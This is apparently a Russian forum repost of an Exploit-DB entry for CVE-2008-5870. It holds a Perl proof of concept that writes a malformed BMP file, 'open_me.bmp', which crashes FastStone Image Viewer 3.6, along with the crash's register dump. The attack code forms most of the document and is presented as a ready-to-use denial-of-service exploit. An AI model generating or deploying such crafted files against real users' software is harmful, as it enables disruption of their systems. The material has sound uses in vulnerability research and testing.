Exploit FastStone Image Viewer 3.6 - '.BMP' Image Crash

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6673
Проверка EDB
  1. Пройдено
Автор
SUN8HCLF
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2008-5870
Дата публикации
2008-10-05
Код:
Name      : FastStone Image Viewer v3.6 (malformed bmp image) DoS Exploit
Credit    : suN8Hclf (DaRk-CodeRs Group), [email protected]
Download: : http://www.FastStone.org
Greetz    : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind, 
            Katharsis, all from #dark-coders and others;]

PoC:

#!/usr/local/bin/perl   
# Open file (File->Open) or simply click on the image miniature
# FastStone Image Viewer v3.6 simply crashes
# Tested on Windows 2000 SP4
#-----INFO----------------------
#EAX 00002847
#ECX 00000000
#EDX 00402818 dumped_F.00402818
#EBX 00402818 dumped_F.00402818
#ESP 00402818 dumped_F.00402818
#EBP 0012DF08
#ESI 00402818 dumped_F.00402818
#EDI 000161E8
#EIP 012F0447
#
#Reason: "Access violation when writing to [00002847]
#-----INFO----------------------

my $code="\x42\x4d\x3c\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00".
         "\x00\x00\xcc\x5f\x01\x00\xe8\x61\x01\x00\x01\x00\x18\x00\x00\x00".
         "\x00\x00\x06\x00\x00\x00\x98\x9e\x00\x00\x88\x77\x00\x00\xff\x02".
         "\xfd\x00\x00\x00\x00\x00\x41";
my $file="open_me.bmp";

open(my $FILE, ">>$file") or die "[!]Cannot open file";
print $FILE $code;
close($FILE);
print "$file has been generated\n"
print "Credit: suN8Hclf, www.dark-coders.pl"

# milw0rm.com [2008-10-05]
 
Источник
www.exploit-db.com

Похожие темы